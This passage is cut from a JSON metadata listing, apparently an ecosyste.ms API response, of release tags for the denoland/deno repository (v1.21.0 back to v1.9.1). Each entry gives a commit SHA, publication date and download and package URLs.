tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload